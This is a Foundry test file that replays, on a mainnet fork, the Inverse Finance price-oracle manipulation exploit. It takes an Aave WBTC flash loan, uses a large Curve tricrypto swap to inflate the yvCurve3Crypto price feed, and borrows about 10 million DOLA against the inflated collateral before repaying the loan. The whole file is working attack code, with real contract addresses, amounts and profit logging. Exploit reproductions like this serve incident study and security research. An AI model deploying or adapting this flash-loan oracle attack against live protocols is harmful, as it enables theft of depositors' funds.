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InverseFinance_exp.sol
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InverseFinance_exp.sol
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// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./interface.sol";
contract ContractTest is DSTest {
IERC20 WBTC = IERC20(0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599);
IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
USDT usdt = USDT(0xdAC17F958D2ee523a2206206994597C13D831ec7);
IERC20 DOLA = IERC20(0x865377367054516e17014CcdED1e7d814EDC9ce4);
ILendingPool aaveLendingPool =
ILendingPool(0x7d2768dE32b0b80b7a3454c06BdAc94A69DDc7A9);
VyperContract curveVyper_contract =
VyperContract(0xD51a44d3FaE010294C616388b506AcdA1bfAAE46);
IERC20 crv3crypto = IERC20(0xc4AD29ba4B3c580e6D59105FFf484999997675Ff);
VyperContract yvCurve3Crypto =
VyperContract(0xE537B5cc158EB71037D4125BDD7538421981E6AA);
VyperContract curveRegistry =
VyperContract(0x8e764bE4288B842791989DB5b8ec067279829809);
VyperContract dola3pool3crv =
VyperContract(0xAA5A67c256e27A5d80712c51971408db3370927D);
VyperContract curve3pool =
VyperContract(0xbEbc44782C7dB0a1A60Cb6fe97d0b483032FF1C7);
CErc20Interface anYvCrv3CryptoInverse =
CErc20Interface(0x1429a930ec3bcf5Aa32EF298ccc5aB09836EF587);
IUnitroller Unitroller =
IUnitroller(0x4dCf7407AE5C07f8681e1659f626E114A7667339);
IAggregator YVCrv3CryptoFeed =
IAggregator(0xE8b3bC58774857732C6C1147BFc9B9e5Fb6F427C);
CErc20Interface InverseFinanceDola =
CErc20Interface(0x7Fcb7DAC61eE35b3D4a51117A7c58D53f0a8a670);
IERC20 crv3 = IERC20(0x6c3F90f043a72FA612cbac8115EE7e52BDe6E490);
address[] assets = [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599];
uint256[] amounts = [2700000000000];
uint256[] modes = [0];
uint256[3] amounts2 = [0, 22500000000, 0];
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("mainnet", 14972418); // fork mainnet at block 14972418
}
function testExploit() public {
aaveLendingPool.flashLoan(
address(this),
assets,
amounts,
modes,
address(this),
"0x",
0
);
emit log_named_uint(
"After flashloan repaid, profit in WBTC of attacker:",
WBTC.balanceOf(address(this))
);
}
function executeOperation(
address[] memory assets,
uint256[] memory amounts,
uint256[] memory premiums,
address initiator,
bytes memory params
) public returns (bool) {
assets;
amounts;
premiums;
params;
initiator;
WBTC.approve(address(curveVyper_contract), type(uint256).max);
WBTC.approve(address(curveRegistry), type(uint256).max);
usdt.approve(address(curveRegistry), type(uint256).max);
DOLA.approve(address(curveRegistry), type(uint256).max);
crv3crypto.approve(
0xE537B5cc158EB71037D4125BDD7538421981E6AA,
type(uint256).max
);
emit log_named_uint(
"Flashloaned, WBTC balance of attacker:",
WBTC.balanceOf(address(this)) / 1e8
);
curveVyper_contract.add_liquidity(amounts2, 0);
emit log_named_uint(
"After add-liquidity, crv3crypto balance of attacker:",
crv3crypto.balanceOf(address(this))
);
emit log_named_uint(
"After add-liquidity, WBTC balance of attacker:",
WBTC.balanceOf(address(this)) / 1e8
);
yvCurve3Crypto.deposit(5375596969399930881565, address(this));
emit log_named_uint(
"Deposited to Yearns Vault, yvCurve3 balance of attacker:",
yvCurve3Crypto.balanceOf(address(this))
);
yvCurve3Crypto.approve(
0x1429a930ec3bcf5Aa32EF298ccc5aB09836EF587,
100000000000000000000000000000000000000000000000000
);
anYvCrv3CryptoInverse.mint(4906754677503974414310);
emit log_named_uint(
"Deposited to Inverse Yearn 3Crypto Vault, anYvCrv3Crypto balance of attacker:",
anYvCrv3CryptoInverse.balanceOf(address(this))
);
address[] memory toEnter = new address[](1);
toEnter[0] = 0x1429a930ec3bcf5Aa32EF298ccc5aB09836EF587;
Unitroller.enterMarkets(toEnter);
emit log_named_int(
"YVCrv3CryptoFeed lastanswer:",
YVCrv3CryptoFeed.latestAnswer()
);
emit log_named_uint(
"Before swap, USDT balance of attacker:",
usdt.balanceOf(address(this))
);
emit log_named_uint(
"Before swap, WBTC balance of CRV3Pool:",
WBTC.balanceOf(address(curveVyper_contract))
);
emit log_named_uint(
"Before swap, WETH balance of CRV3Pool:",
WETH.balanceOf(address(curveVyper_contract))
);
emit log_named_uint(
"Before swap, USDT balance of CRV3Pool:",
usdt.balanceOf(address(curveVyper_contract))
);
curveRegistry.exchange(
address(curveVyper_contract),
address(WBTC),
address(usdt),
2677500000000,
0,
address(this)
);
emit log_named_uint(
"After swap, USDT balance of attacker:",
usdt.balanceOf(address(this))
);
emit log_named_uint(
"After swap, WBTC balance of CRV3Pool:",
WBTC.balanceOf(address(curveVyper_contract))
);
emit log_named_uint(
"After swap, WBTC balance of CRV3Pool:",
WETH.balanceOf(address(curveVyper_contract))
);
emit log_named_uint(
"After swap, USDT balance of CRV3Pool:",
usdt.balanceOf(address(curveVyper_contract))
);
emit log_named_int(
"Manipulated YVCrv3CryptoFeed lastanswer:",
YVCrv3CryptoFeed.latestAnswer()
);
InverseFinanceDola.borrow(10133949192393802606886848);
emit log_named_uint(
"DOLA balance of attacker:",
DOLA.balanceOf(address(this))
);
curveRegistry.exchange(
address(curveVyper_contract),
address(usdt),
address(WBTC),
75403376186072,
0,
address(this)
);
emit log_named_uint(
"After swap, WBTC balance of attacker:",
WBTC.balanceOf(address(this)) / 1e8
);
curveRegistry.exchange(
address(dola3pool3crv),
address(DOLA),
address(crv3),
10133949192393802606886848,
0,
address(this)
);
emit log_named_uint(
"After swap,3crv balance of attacker:",
crv3.balanceOf(address(this))
);
curve3pool.remove_liquidity_one_coin(9881355040729892287779421, 2, 0);
emit log_named_uint(
"After swap, USDT balance of attacker:",
usdt.balanceOf(address(this))
);
curveRegistry.exchange(
address(curveVyper_contract),
address(usdt),
address(WBTC),
10000000000000,
0,
address(this)
);
emit log_named_uint(
"After swap, WBTC balance of attacker:",
WBTC.balanceOf(address(this))
);
WBTC.approve(address(aaveLendingPool), 2702430000000);
return true;
}
receive() external payable {}
}